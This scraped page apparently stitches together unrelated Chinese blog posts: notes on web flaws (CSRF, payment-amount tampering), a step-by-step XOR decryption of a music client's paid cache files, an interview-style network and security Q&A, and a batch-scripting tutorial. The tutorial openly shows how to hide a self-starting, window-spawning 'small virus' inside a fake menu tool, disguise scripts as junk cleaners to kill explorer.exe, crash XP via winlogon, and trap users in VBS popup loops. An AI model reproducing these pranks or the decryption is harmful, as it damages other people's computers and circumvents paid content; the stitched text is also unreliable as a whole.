    汤神建议尽量把前台的方法和后台的方法区分开来。越权,其实不仅仅限于展示,我们刚刚看到了这个订单,张三可以看到李四的订单信息是查看,但是有的时候我们修改订单的时候也会出现这个问题,所以在读写的时候都需要注意一下这个越权的问题。


    4.CSRF跨站请求伪造

    CSRF通常会配合XSS使用。服务端错把浏览器发起的请求当成用户发起的请求,会造成XSS问题。比如说我打开了张三的网站,登陆了一个用户信息,李四网站上有一个攻击代码,向张三这个网站发起请求,张三的网站会以为你本人发起的请求,实际上是浏览器发出的请求。
    产生原因为:
    1)服务端错把“浏览器发起的请求”当成“用户发起的请求”
    2)已登录的浏览器,打开恶意网址后,被执行了相应操作

    下图中有一个表单,左边是它的源码,我们可以看到表单每一项都在,但是从安全的角度上考虑它是少了一样东西,没有一些验证码或者TOKEN等等相关信息。服务端如果没有验证这个问题,就会造成这个CSRF的攻击。

    如何检测我们的系统当中是否存在这个CSRF?
    1)去掉token参数尝试能够正常请求
    2)去掉referer是否可以提交成功
    3)是否能用GET提交替代POST提交

    如果以上都存在,那么它就存在CSRF。建议一定要验证Reeferer信息、Token验证、图片验证码等。根据业务安全等级越高,最基础的可以用这个refefe验证,再高一级就是token,再高一级就是图片验证。


    5.支付漏洞

    最后看看支付漏洞。汤神之前看到一个新闻,有一个浙江老板,他想做线上找人做了一个网站,这个网站存在着一些支付漏洞,一周之后他发现这个订单量极速上升,卖了70多万,结果看了一下帐户余额只有几千块钱,报警之后才查到原因,但是货物已经发出去了。

    支付漏洞主要产生的原因包括:
    1)开发者在数据包中传递支付的金额
    2)后端没有对金额做校验或者签名
    3)导致攻击者可以随意篡改金额提交

    造成这些漏洞原因有很多,比如说支付金额是由前端提交的数据,不是后端计算的,而且没有对这个金额做校验,直接信任前端提交的金额,导致这个攻击者可以随即修改这个金额,比如修改为一分钱,这是非常典型的可以随意更改这个金额。
    上面的金额是94元,这个表单里面改为一分钱,最后提交的时候是一分钱,这是非常好的漏洞,也是非常典型的。

    修改数量:

    还有一个问题是数量的限制,一个价格是26元,一个是27元,把这个数量变为负一之后,一提交变为一块钱了。这是之前数据包的漏洞,他充值了一块钱,他发现有一个数据包向网站发送,他就把这个数据包反复重放,就加了好几次,实际上只充值了一块钱。

    如何防范?
    可以限制这个低价购买产品,比如说负数的时候肯定不行,等于零的商品根据业务情况也是需要多注意的。限制免费商品获得金钱和积分的情况,有一些商品免费,但是它可以获得一些积分,那就存在着刷积分的情况。

    最后给出了汤神此次分享的思维导图。

    PS:真心感激自己要学习的知识好多,也有好多大神卧虎藏龙,低调加油,一起进步~


    三.音乐异或解密示例

    接下来复现CSDN“鬼手56”大神的文章,他的网络安全、Crackme、病毒分析、软件逆向等系列文章真心推荐大家学习,包括他开源的项目,他的文章我都准备all in。

    顺便补充我俩的对话,一句“今天最开心的是就是看到你的这条评论”道出了多少程序员的纯真和可爱,分享知识和开源代码的路上,真需要你我的点赞。电脑前的你我,一路同行。

    参考原文:https://blog.csdn.net/qq_38474570/article/details/87878235


    我们打开PC端某音乐客户端,比如想下载周杰伦的“骑士精神”,通常需要提示付费。

    此时点开设置,选中“下载设置”,找到缓存文件目录。
    C:\Users\yxz\AppData\Local\Netease\CloudMusic\Cache\Cache

    双击播放该歌曲,然后按照寻找最新的文件或只保留一首歌,其中后缀名为“.uc”的最大文件就是加密过后的文件。

    接在将文件拖动到010 Editor软件,如下图所示:它是一个加密文件,最多的数据是A3,鬼手大神成果的预测其是加密后的无意义0,通常音频的加密方式不会太复杂,而最简单的异或加密(可逆)。

    接着点开菜单,Tools(工具),将其转换为“十六进制”,进行“二进制异或”操作,修改数据为无符号十六进制,并对A3进行异或即可。

    注意选择无符号(Unsigned Byte)和异或A3。

    异或加密解密:

    A3 ⊕ A3 = 00

    A 01100001  3  00000011
    A 01100001  3  00000011
    0 00000000  0  00000000
    

    文件解密如下所示,其中A3变换为00,解密完之后的字符变得有意义。前三个字节是ID3,这个是MP3文件格式的头部。

    最后将文件重命名为“.mp3”,此时可以听歌了,“骑士精神”走起。

    PS:这是一个简单的加密过程,推荐读者们下载正版歌曲,共同维护版权和绿色网络环境。同时,异或加密音乐已经很多年了,希望这些开发公司优化下加密算法,解决这个漏洞。这篇文章更希望分享加密的过程给读者。


    四.总结

    希望这篇基础性文章对你有所帮助,如果有错误或不足之处,还请海涵。后续将分享更多网络安全方面的文章了,从零开始很难,但秀璋会一路走下去的,加油。

    故人应在千里外,
    不寄梅花远信来。
    武汉第一周学习结束,寄了第一封家书给女神,接下来这几年,应该会写上200来封吧,很期待,也很漫长,但我俩的故事将继续书写。

    未来的路还很长,优秀的人真的太多,我们只有做好自己,不忘初心,享受生活,砥砺前行。明天周末继续奋斗,晚安娜,记得收信。

    (By:Eastmount 2019-07-31 周三晚上7点写于武大 https://blog.csdn.net/Eastmount )


    2020年8月18新开的“娜璋AI安全之家”,主要围绕Python大数据分析、网络空间安全、人工智能、Web渗透及攻防技术进行讲解,同时分享CCF、SCI、南核北核论文的算法实现。娜璋之家会更加系统,并重构作者的所有文章,从零讲解Python和安全,写了近十年文章,真心想把自己所学所感所做分享出来,还请各位多多指教,真诚邀请您的关注!谢谢。

    展开全文
  • 网络安全与渗透测试工程师

    千人学习 2019-08-22 10:42:38
    随着社会基础产业全面互联网化,国家对网络安全的人才需求也呈现出井喷趋势。网络安全面临的威胁越来越大,然而我国只有126所高校设立了143个网络安全相关专业,仅占1200所理工院校的10%。所以这套课程主要讲解面试...
  • 网络安全

    2020-11-10 16:42:26
    1.防范常见的Web攻击 1)什么是SQL注入攻击? ... ...如果此时使用参数构造的方式,就会出现select * from user where name =‘root’ and password = ‘’ or ‘1’ = ‘1’。... 如何防范SQL注入攻击?...

    1.防范常见的Web攻击
    1)什么是SQL注入攻击?
    攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造并在数据库中执行。
    用户登录时,输入用户名:root,密码:‘’or‘1’=‘1’。如果此时使用参数构造的方式,就会出现select * from user where name =‘root’ and password = ‘’ or ‘1’ = ‘1’。此时不管用户名和密码是什么内容,查询出来的用户列表都不为空。

    如何防范SQL注入攻击?
    web端:
    1)有效性验证
    2)限制字符串输入的长度
    服务端:
    1)不用拼接SQL字符串
    2)使用预编译的PrepareStatement
    3)有效性检验(为什么服务端还要做有效性检验?因为外部都是不可信的,防止攻击者绕过Web端请求)
    4)过滤SQL中参数的特殊字符,比如单引号、双引号。

    2)什么是XSS攻击?
    跨站点脚本攻击,指攻击者通过篡改网页,嵌入恶意脚本程序,在用户浏览网页时,控制浏览器进行恶意操作的一种攻击方式。

    怎么防范XSS攻击?
    1)前端、服务端,需要对字符串输入的长度进行限制。
    2)前端、服务端同时需要对HTML转义处理。将其中的“<”“>“”等特殊字符进行转义编码。防止XSS攻击的核心是必须对输入的数据进行过滤处理。

    3)什么是CSRF攻击?
    跨站点请求伪造,指攻击者通过跨站请求,以合法用户的身份进行非法操作。简单理解为攻击者盗用你的身份,以你的名义向第三方网站发送恶意请求。CSRF能做的事情包括用你的身份发送邮件、发短信、进行转账交易,甚至盗取账号信息。

    如何防范CSRF攻击?
    1)安全框架:例如Spring Security。
    2)token机制:在HTTP请求中进行token验证,如果请求中没有包含token或者token内容不正确,则认为是CSRF攻击而拒绝该请求。
    3)验证码:利用验证码能够很好遏制CSRF攻击,但是出于用户体验考虑,验证码只能作为一种辅助手段,而不是最主要的解决方案。
    4)referer识别:在HTTP头部有一个Referer字段,它记录了HTTP请求的来源地址,如果Referer是其他网站,就可能是CSRF攻击,则拒绝该请求。但是,服务器并非都能取到Referer,很多用户出于隐私保护,限制Referer发送;在某些情况下,浏览器也不会发送Referer,例如HTTPS跳转到HTTP。
    基本思路:验证请求来源地址;关键操作添加验证码;在请求地址添加token并验证。

    4)什么是文件上传漏洞?
    文件上传漏洞,指的是用户上传一个可执行的脚本文件,并通过脚本命令获得执行服务端命令的能力。

    如何防范文件上传漏洞?
    1)判断文件类型。
    2)对上传的文件类型进行白名单校验,只允许上传可靠类型。
    3)对上传的文件进行重新命名,使攻击者无法直接获得上传文件的访问路径。
    4)限制上传文件的大小。
    5)单独设置文件服务器的域名。

    5)DDoS攻击是什么?
    分布式拒绝服务攻击可以使很多计算机同时遭受攻击,使被攻击目标无法正常使用。简单点说就是同一时间的请求量超过了服务器的负载,造成服务器崩溃。
    DDos预防:
    1)限制同时打开SYN半链接的数目。
    2)缩短SYN半链接的超时时间。
    3)关闭不必要的服务。

    2.重要协议分布图
    在这里插入图片描述3.ARP协议的工作原理
    ARP即地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议。
    工作原理:
    每个主机都会在自己的ARP缓冲区建立一个ARP列表,存储IP地址与MAC地址之间的对应关系。主机新加入网络时,会发送ARP报文把自己的IP地址与MAC地址的映射关系广播给其他主机。网络中的主机接收到免费的ARP报文时,会更新自己的ARP缓冲区,将新的映射关系更新到自己ARP列表中。
    某个主机需要发送报文时,首先检查自己的ARP列表中是否有对应的IP地址的目的主机的MAC地址,如果有,则直接发送数据;如果没有,就向本网段的所有主机发送ARP数据包,该数据包包括源主机IP地址、源主机MAC地址、目的主机的IP地址等。当本网络的所有主机收到该ARP数据包时:首先检查数据包中的目的IP地址是否是自己的IP,如果不是则忽略本包;如果是,就先取出数据包中IP和MAC地址写入自己的ARP列表中,如果已经存在则将其覆盖。然后再将直接的MAC地址写入ARP响应包中,告诉源主机自己是它想要找的MAC地址。源主机收到ARP响应包后,将目的主机的IP和MAC地址写入自己的ARP列表中,并利用该表发送数据。如果源主机一直没收到ARP响应数据包,则表示ARP查询失败。ARP高速缓存(即ARP表)是ARP地址协议能够高效运行的关键。

    4.什么是RARP?工作原理是什么?
    RARP是反向地址转换协议,与ARP工作方式相反,属于网络层协议。RARP使只知道自己硬件地址的主机能够知道其IP地址。RARP发出要反向解释的物理地址并希望返回其IP地址,应答包括能够提供所需信息的RARP服务器发出的IP地址。
    原理:1)网络上的每台设备都会有一个独一无二的硬件地址,通常是有设备厂商分配的MAC地址。主机从网卡上读取MAC地址,然后在网络中发生一个RARP请求的广播数据包,请求RARP服务器回复该主机的IP地址。2)RARP服务器收到RARP请求数据包后,为其分配IP地址,并将RARP回应发送给主机。3)主机收到RARP回应后,就能使用得到的IP地址进行通信。

    5.DNS是什么?DNS的工作原理?
    DNS应用层协议是将主机域名转换为IP地址,属于应用层协议,使用UDP传输。
    本地域名服务器向根域名服务器的查询采用迭代查询:1)当用户输入域名时,先在浏览器缓存中查找有没有这个域名映射的IP地址,如果有,则解析结束。2)如果未命中,则在系统缓存中查找有无映射,有则解析结束。3)若无命中,则在本地HOSTS文件中查找,有则解析结束。4)若以上情况都无命中,就递归地去域名服务器中去查找。

    6.OSPF协议?OSPF的工作原理?
    OSPF(Open Shortest Pass First开放最短路径优先协议),是一个最常用的内部网关协议,是链路状态协议,属于网络层协议。
    原理:OSPF广播的方式是在所有开启OSPF的接口发送Hello包,用来确定是否有OSPF邻居,若发现了,则建立OSPF邻居关系,形成邻居表,之后相互发送LSA(链路状态通告)相互通告路由,形成LSDB(链路状态数据库)。再通过SPF算法,计算最佳路径后放入路由表。

    7.TCP和UDP区别的总结?
    1)TCP是面向连接的,提供可靠服务;而UDP是无连接的,发送数据前不需要建立连接;UDP尽最大可能交付,因此不会产生建立连接的时延,而TCP会产生时延,故TCP比UDP更慢。
    2)UPD有更好的实时性,工作效率更高,适用于高速传输和实时性要求较高的通信。
    3)TCP连接只能是1对1的;UDP支持1对1,1对多,多对1,和多对多的交互通信。
    4)TCP的首部开销为20字节,而UDP只有8字节。UDP的分组首部开销更小。
    5)TCP是面向字节流的,实际上TCP把数据看成一连串无结构的字节流;而UDP是面向报文的,报文时UDP数据报处理的最小单位。
    6)UDP适合一次性传输较小数据的网络应用,如DNS。

    8.什么是三次握手四次挥手?TCP为什么要三次握手?
    三次握手的原因:为了防止已失效的请求报文突然又传送到服务器端,因为产生错误。
    三次握手:
    第一次握手:建立连接时,客户端发送SYN包到服务端,进入SYN_SEND状态,等待服务器确认。
    第二次握手:服务其收到SYN包,必须确认客户的SYN,同时自己也发送一个SYN+ACK包,此时服务器进入SYN_RECV状态。
    第三次握手:客户端接收到服务器的SYN_ACK包,向服务器发送确认包ACK,此包发送完毕,客户端和服务器端进入ESTABLISHED状态,完成握手。
    完成三次握手,客户端与服务器端开始传输数据。
    在这里插入图片描述四次挥手:
    第一次挥手:主动关闭方发送一个FIN,用来关闭主动方到被动方的数据传送,主动方不会再向被动方发送数据,但此时主动方还能接受被动方传来的数据。
    第二次挥手:被动关闭方收到FIN包后,发送一个ACK给主动方,表示接受到了请求关闭的请求。
    第三次挥手:被动关闭方的数据传送完毕后,在发送一个FIN信号,用来关闭被动关闭方到主动关闭方的数据传送,告诉主动关闭方数据已发送完,不会再传送数据了。
    第四次挥手:主动关闭方收到FIN信号后,发送一个ACK给被动关闭方,然后再等待2倍最大传输时长后断开连接。至此完成四次挥手。
    最后等待2倍最大传输时长的原因是等待信道中的所有报文都消失,避免影响之后的请求报文。
    在这里插入图片描述TCP如何保证可靠传输?
    三次握手
    校验和:校验出包有错,丢弃报文段,不给出响应。
    序列号:对失序数据进行重新排序,然后才交给应用层。
    确认应答:对于收到的请求,给出确认响应。
    超时重传:当TCP发出一个段后,启动一个定时器,如果不能及时收到确认就重发。
    连接管理
    流量控制:TCP连接的每一方都有一个固定大小的缓冲区,TCP接收端只允许发送端发送数据到缓冲区,这样可以防止较快的主机使较慢主机的缓冲区溢出。
    拥塞控制:当网络拥塞时,减少数据的发送。

    9.Get和Post的区别?
    1)get是获取数据,post是修改数据。
    2)get提交的数据最大是2K,post理论上没有限制。
    3)get产生一个TCP数据包;而Post产生两个TCP数据包,浏览器先发送header,服务器响应100 Continue后,浏览器再发送data,服务器响应200 OK。
    4)Get请求会被浏览器主动缓存,而post不会,除非手动设置。

    10.session的工作原理?
    session的工作原理是在客户端登录完成之后,服务器会创建对应的session,session创建好了以后,会把创建好的session的ID发送给客户端,客户端再存储在浏览器中。这样客户端每次访问服务器时,都会带着sessionID,服务器拿到sessionID以后从内存中查找对应的session,这样就可以正常工作了。

    11.Cookies和session的区别?
    Cookies和session都是客户端与服务器端之间保持状态的解决方法。
    1)存储的位置不同。cookies放在客户端,session放在服务端,session存储的数据比较安全。
    2)存储的数据类型不同。虽然两者都是key-value结构,但针对value的类型是有差异的。cookies的value只能是字符串类型;session的value是Object类型。
    3)存储的数据大小限制不同。cookies:大小受浏览器限制,很多是4K大小;session:理论上受当前内存的限制。
    4)生命周期的限制。cookies的生命周期是累计,从创建就开始计时,20分钟后,cookies生命周期结束,当浏览器关闭的时候,cookies的生命周期就消亡了。session的生命周期是间隔的,从创建时开始计时,如在20分钟内,没有访问session,那么session生命周期被销毁。

    12.一次完整的HTTP请求过程?
    域名解析——>发起TCP三次握手——>建立TCP连接后发起HTTP请求——>服务器响应HTTP请求,浏览器得到HTML代码——>浏览器解析HTML代码,并请求HTML代码中的资源(如js、css、图片等)——>浏览器对页面进行渲染呈现给用户。

    13.HTTPS和HTTP的区别?
    1)HTTP协议传输的数据是未加密的,也是明文的,因此使用HTTP协议传输隐私协议非常不安全。HTTPS协议是由SSL+HTTP协议构建的可进行加密传输、身份认证的网络协议,相比于HTTP协议更安全。
    2)HTTPS协议需要申请证书,需要一定的费用。
    3)HTTP和HTTPS使用的连接方式完全不同,用的端口也不一样,前者是80,后者是443.

    14.OSI的七层模型?
    应用层:为用户的应用进程提供网络通信服务。
    表示层:处理用户信息的表示问题,数据的编码、解码、压缩、加密、解密。
    会话层:负责在网络中的两节点之间建立、维持和终止通信。
    传输层:在源端和目的端提供可靠的透明数据传输。
    网络层:将网络地址翻译成对应的物理地址,并通过路由算法选择最适当的路径。
    数据链路层:接收来自物理层的位、流形式的数据,并封装成帧,传输到上一层。
    物理层:利用传输媒介为数据链路层提供物理连接,实现比特流的透明传输。

    15.常见的状态码有哪些?
    200 OK//客户端请求成功
    403 Forbidden//服务器收到请求,但是拒绝提供服务
    404 Not Found//请求资源不存在
    500 Internal Server Error//服务器发送不可预期的错误

    16.URL和URI的区别?
    URI:同一资源标识符,用来标识唯一的资源。
    URL:资源定位符,不仅用来标识资源,还能指明如何定位到这个资源。

    17.什么是SSL?SSL是怎么工作保证安全的(HTTPS是如何保证数据传输安全的?)?
    SSL代表安全套接字层,它是一种用于加密和验证应用程序(如浏览器)和Web服务器之间发送数据的协议。HTTP的加密机制是一种共享密匙加密和公开密匙加密并用的混合加密机制。
    SSL/TLS协议作用:认证用户和服务,加密数据,维护数据的完整性的应用层协议加密和解密需要两个不同的密匙,故被称为非对称加密;加密和解密都使用同一个密匙的被称为对称加密。
    加密、解密效率通常比较高HTTPS是基于非对称加密的,公匙是公开的。

    HTTPS的工作流程:
    1)客户端向服务器端发起SSL连接请求。
    2)服务器端把公匙发送给客户端,并且服务器端保存着唯一的私钥。
    3)客户端用公钥对双方通信的对称秘钥进行加密,并发送给服务器端。
    4)服务器端利用自己的唯一私钥对客户端发送发来的对称秘钥进行解密。
    5)进行数据传输。服务器和客户端双方用公用的相同的对称秘钥对数据进行加密解密,可以保证数据在收发过程中的安全性。
    SSL/TLS协议的基本思路是采用公匙加密法,客户端向服务器端索要公匙,然后用公匙加密信息,服务器收到密文后,用自己的私钥进行解密。

    如何保证公钥不被篡改?
    1)客户端向服务器端索要并验证公匙。
    2)双方协商生成“对话密钥”。
    3)双方采用“对话密钥”进行加密通信。

    展开全文
  • 1.如何制作一个死循环(简单) :d start goto d 这里单写一个start是打开cmd窗口,start后面写地址就是打开其他的东西了。 :d 注意:一定是要用英文的,中文没有作用 ...goto 区块名 #程序跳该区块 ...

    目录

    1.如何制作一个死循环(简单)

    2.如何在启动项中打开这个程序

    3.写一个小程序(变量)

    4.上面那个小程序功能完善(加上if,goto)

    5.如何修改上面那个程序,让其中的一个选项带有恶意脚本(节选)

    6.后面可以尝试的几种思路

    7.最简单的蓝屏炸弹文件(针对xp或2003的蓝屏命令)

    8.强制杀死一个桌面

    9.还有一些指令,一些小玩意和对批处理的介绍

    10.扩展:

    1.一个简单的脚本

    2.一个简单的死循环脚本


    1.如何制作一个死循环(简单)

    :d
    start
    goto d
    •  这里单写一个start是打开cmd窗口,start后面写地址就是打开其他的东西了。
    • :d     注意:一定是要用英文的,中文没有作用 

    goto 区块名              #程序跳该区块

    例如:goto menu      #程序跳至“menu区块”,中间被跳过的区块就作废了

    2.如何在启动项中打开这个程序

    启动项:就是开机的时候系统会在前台或者后台运行的程序。当操作系统完成登录过程,进程表中出现了很多的进程。操作系统在启动的时候,自动加载了很多程序。

    • copy 原地址 目的地址         复制粘贴
    copy qq.bat C:\Documents and Settings\用户名\「开始」菜单\程序\启动
    :d
    start
    goto d

     升级版:因为如果放到别的电脑,用户名不同也无法运行。并且像xp都没有管理员登录,那不就没有用了。

    copy qq.bat “%userprofile%\「开始」菜单\程序\启动”
    :d
    start
    goto d
    • 像带有特殊符号(开始)的,要在前后加一个  " "
    • userprofile是变量  (userprofile代表的是你的系统登录名,你的系统登录名是什么,他就是什么)——这样保证了哪怕在不同的用户名下也能在开始菜单的启动项里运行。
    • 两边加%,代表取值。
    运行后效果图(升级版)

     3.写一个小程序(变量)

    @echo off        
    color 0a            
    title 哈哈小程序v1.0  
      
    echo ==========================
    echo               菜单
    echo         1、修改管理员密码
    echo         2、定时关机
    echo         3、取消定时
    echo         4、退出程序
    echo ===========================
    :1
    set /p u=请输入用户名:
    set /p p=请输入新密码:
    net user %u% %p%   >nul
    :2
    set /p a=请输入时间(单位/秒):
    shutdown -s -f -t %a%
    :3
    shutdown -a
    :4
    exit
     
     
    pause

     set /p u= ( 字符串 )      #获取输入的字符,将其赋值给变量u

     %u%                              #提取变量u的值

    • set /p u=请输入用户名:       红字部分是给别人看的(因为你加了/p(/p是选项的意思),如果没加的确是u=请输入用户名)

     net user 用户名 密码      #修改账户密码(windows所有平台支持)

     >nul       #清除一条命令执行后系统反馈

    shutdown -s -f -t 100 定时强制关机

    shutdown -r -t 秒 定时重启

    shutdown -a 取消定时

    shutdown -l 注销,同logoff命令相同

    shutdown -s -f -t 100 -c "haah"(把你想要说的话放到双引号里,后面它会在提示的那个消息里呈现)

    但这个代码有个问题,我就想修改管理员代码,但执行完1,后面的2,3也会跟着执行。

    4.上面那个小程序功能完善(加上if,goto)

    @echo off        
    color 0a            
    title 哈哈小程序v1.0  
    :menu
    cls  
    echo ==========================
    echo               菜单
    echo         1、修改管理员密码
    echo         2、定时关机
    echo         3、取消定时
    echo         4、退出程序
    echo ===========================
    set /p num=您的选择是:   
    if "%num%"=="1" goto 1
    if "%num%"=="2" goto 2
    if "%num%"=="3" goto 3
    echo 再见,我亲爱的朋友
    pause
    goto menu
    
    :1
    set /p u=请输入用户名:
    set /p p=请输入新密码:
    net user %u% %p%   >nul
    echo 您的密码已经设置成功!
    pause
    goto menu
    
    :2
    set /p a=请输入时间(单位/秒):
    shutdown -s -f -t %a%
    set /p x=是否取消(1:是,0:否):
    if "%x%"=="1" shutdown -a
    pause
    goto menu
    
    :3
    shutdown -a
    pause
    goto menu
    
    :4
    exit
     
    pause
    • 在合适的地方使用cls,能让界面更整洁。
    • echo 再见,我亲爱的朋友
      pause
      goto menu                    
      这个也很重要,如果没加,我假如没选1~4的数字,if不成立,它会像原来一样按顺序进行。

    加了,我选择1~4以外数字,会跳出“再见,我亲爱的朋友”这句话。

    5.如何修改上面那个程序,让其中的一个选项带有恶意脚本(节选)

    :2
    echo :a >>“%userprofile%\「开始」菜单\程序\启动\haha.bat”
    echo start >>“%userprofile%\「开始」菜单\程序\启动\haha.bat”
    echo goto a >>“%userprofile%\「开始」菜单\程序\启动\haha.bat”
    
    • 这个的作用就是在启动项下创建一个循环开启cmd窗口的小病毒

    1.> 清空原来语句,并将前面语句放入(覆盖)

      >> 将前面语句输入到文件的最后一行,不对原文做修改(追加)

    6.后面可以尝试的几种思路

    1. 伪装垃圾清理程序添加一个开机自启动项,无限弹出CMD窗口
    2. 伪装垃圾清理程序强制终止桌面进程
    3. 可以让开机出现蓝屏,无限弹出cmd窗口,定时关机等问题。

    7.最简单的蓝屏炸弹文件(针对xp或2003的蓝屏命令)

    ntsd -c q -pn winlogon.exe

    ntsd       #杀死进程 

    ntsd -c q -pn 进程名     #强制杀死进程

    蓝屏原因:winlogon 进程不能被杀死,我想强制杀死,系统不让,结果导致蓝屏!

    对win2003有很大的杀伤力,但对win2008基本没有杀伤力(……对win7win10已经不起作用了,还是需要组合一下才能再次起作用)

    winlogon.exe——是Windows NT 用户登陆程序,用于管理用户登录和退出(我们正在使用它)

    8.强制杀死一个桌面

    taskkill /im explorer.exe /f
    • /f ——强制,taskkill——杀死进程,/im——进程名       

    我习惯是先杀死进程,再写上要延时的设置

    9.还有一些指令,一些小玩意和对批处理的介绍

    1.@echo off   关闭回显——屏蔽执行过程

    2. pause:暂停,使用这条命令后面的命令暂时不能执行。得等我们给下一个命令才会继续。(会有一个请按任意键继续)

    3. echo .       是空一行的意思

    4.   >nul 是屏蔽操作成功显示的信息,但是出错还是会显示(即1>nul)。

          2>nul 是屏蔽操作失败显示的信息,如果成功依旧显示。
          >nul 2>nul 就是正确的错误的一起屏蔽掉,就啥也不显示了。在最后面加1>nul 2>nul这样不管文件是否删除成功都不会显示任何消息。

    5.分区块

    :menu                   "menu"区块

    :1                           “1”区块

    :2                           “2”区块

    这不是一个命令,但它会被识别,它会知道我要进入哪一个区块了。

    6.批处理作用

    自上而下成批处理每一条DOS命令,直到执行到最后一条!

    7.如何创建批处理

    扩展名:.bat

    创建方法:新建一个记事本文件,然后将其扩展改为.bat

    8.修改关联性assoc(把很多扩展名的关联性给改了,最后无法执行批处理)

    双击执行批处理的一瞬间,批处理会偷偷帮我们打开一个cmd窗口,然后执行一条条命令

    DOS窗口也是一个程序(cmd.exe),把exe改成txt。

    9.做一个延迟:ping -n 10 127.0.0.1 >null 2>null(反正也没想它ping通,只是单纯想做一个延迟,如果你想拖更久时间,可以随便乱写一个——很多东西要自己去思考,才会能把你学到的东西活学活用,这就是目前看到学网安的乐趣)


    10.扩展:

    1.一个简单的脚本

    msgbox "我最帅!"

    测试效果:

    方法:把txt改成vbs(脚本语言)。

    2.一个简单的死循环脚本

    do
     msgbox "我最帅!"
    loop

    测试效果:

     效果:窗口无法关闭

    解决方法:

    vbs 使用微软自带的wscript.exe来编写的

    升级版:(极其有趣,无法按叉号关闭,只能循环一直按下去)

    do
    msgbox "飞哥最帅!"
    msgbox "小子,你对这件事有异议吗"
    msgbox "你要为此付出代价"
    msgbox "从现在开始我要求你点100下鼠标"
    msgbox "100"
    msgbox "99"
    msgbox "98"
    msgbox "97"
    msgbox "96"
    msgbox "95"
    msgbox "94"
    msgbox "93"
    msgbox "92"
    msgbox "91"
    msgbox "90"
    msgbox "...."
    msgbox "3"
    msgbox "2"
    msgbox "1"
    msgbox "如果你看到这里,说明你确实很执着,你感动了我,请再点一下"
    msgbox "年轻人,有时候执着也没用,换个姿势再来一次"
    loop

    如何打开任务管理器?

    • 快捷键:Ctrl+Shift+Esc 
    • 快捷键:Ctrl+Alt+Delete 
    • 右键任务栏

         ……

    展开全文
  • 一、常用的搜索技巧 filetype的使用 在搜索的内容后加入 filetype:类型如pdf、doc等。 未加filetype的情况下: ...比如这里我输入“华为认证HCIP”,得到的答案这些字有可能连在一起,也有可能是分开的。...
  • 【转载】如何成为优秀的网络安全工程师

    千次阅读 多人点赞 2019-08-21 23:23:50
    我2005年3月份来哈尔滨办事处从事技术工作。三年来,在日常工作学习中总结了一些经验与教训,拿来与大家分享...网络安全工程师通常分为售前和售后两类。售前工程师主要负责用户交流、建议方案的设计以及投标书的撰...
  • 网络安全工程师的学习路线

    万次阅读 多人点赞 2017-10-24 17:15:40
    Web安全工程师 概念基础 一.了解黑客是如何工作的 1.在虚拟机配置Linux系统 2.漏洞测试工具 3.msf控制台 4.远程工具RATS 5.远程访问计算机 6.白帽 二.技术基础 漏斗扫描工具AWVS AWVS简介 安装 站点扫描 扫码结果...
  • 网络安全工程师

    千次阅读 2014-09-09 11:07:37
    岗位职责:
  • github网络安全工具合集

    万次阅读 2020-08-19 17:56:55
    漏洞练习平台 WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: ...zvuldirll漏洞练习平台: https://github.com/710leo/ZVulDrill vulapps漏洞练习平台: ...dvwa漏洞练习平台: ...
  • 网络安全工程师面试题tcp/ip篇

    万次阅读 多人点赞 2016-08-17 10:54:56
    最近在面试网络安全工程师,在面试过程中网络基础知识必须满足以下几点: 1、理解模型:尤其必须理解OSI、TCP/IP、Cisco和纵深防御网络模型。 2、理解第二层相关问题:包括了冲突域、广播域、交换与集线、端口安全...
  • 网络安全工程师学习路线汇总

    千次阅读 多人点赞 2020-02-13 12:47:19
    随着互联网日益走进人们的衣食住行各个方面,网络安全也渐渐成为大众所关心重视的点。...因此各行业将网络安全工程师纳入企业日常配置已成必然之势。 这也就意味着,学好网络安全,无论是对于自己的未来就业发展,...
  • 01.网络安全-信息收集专题1.信息收集专题概述2.利用搜索引擎收集信息3.通过目标站点收集信息4.漏洞信息收集5.使用工具收集信息(一)6.使用工具收集信息(二)7.在社交网站中进行数据挖掘阶段二:安全工具本阶段主要...
  • 01.网络安全-信息收集专题 1.信息收集专题概述 2.利用搜索引擎收集信息 3.通过目标站点收集信息 4.漏洞信息收集 5.使用工具收集信息(一) 6.使用工具收集信息(二) 7.在社交网站中进行数据挖掘 阶段二:...
  • 网络安全工程师;信息安全工程师 1、工作内内容不同 网络安全工程师:分析网络现状。对网络系统进行安全评估和安全加固,设计安全的网络解决方案;在出现网络攻击或安全事件时,提高服务,帮助用户恢复系统及调查...
  • 网络工程师:敲cisco实验加实践、搭服务器(win2003、2008)、管理linux(ubuntu)、数据库mysql+oracle(自己搭建个人博客平台PHP、Python)、vsphere(紧跟着云)、学习安全。其他能力:沟通能力、文档编写与阅读...
  • 人工智能逐渐取代网络安全工程师

    千次阅读 2018-08-27 01:54:42
    每天通过互联网上传的视频、图片、文字数据,用“海量”形容毫不为过...21日,由中国互联网协会和阿里巴巴等共同举办的“2018网络安全生态峰会”在北京开幕。AI在助力网络内容安全上扮演的重要角色成为此次峰会的...
  • 我2005年3月份来哈尔滨办事处从事技术工作。三年来,在日常工作学习中总结了一些...合格工程师的N个基础素质 网络安全工程师通常分为售前和售后两类。售前工程师主要负责用户交流、建议方案的设计以及投标书的撰写等
  • “战疫”进行时,多个行业线下转线上求生,云买菜、云蹦迪、云相亲、云聚会等悄然兴起,未来属于云时代似乎成为互联网的共识,而与互联网息息相关的网络安全领域,或将站上澎湃发展的“风口”。日前,360网络安全...

空空如也

1 2 3 4 5 ... 20
收藏数 1,191,543
精华内容 476,617
关键字:

网络安全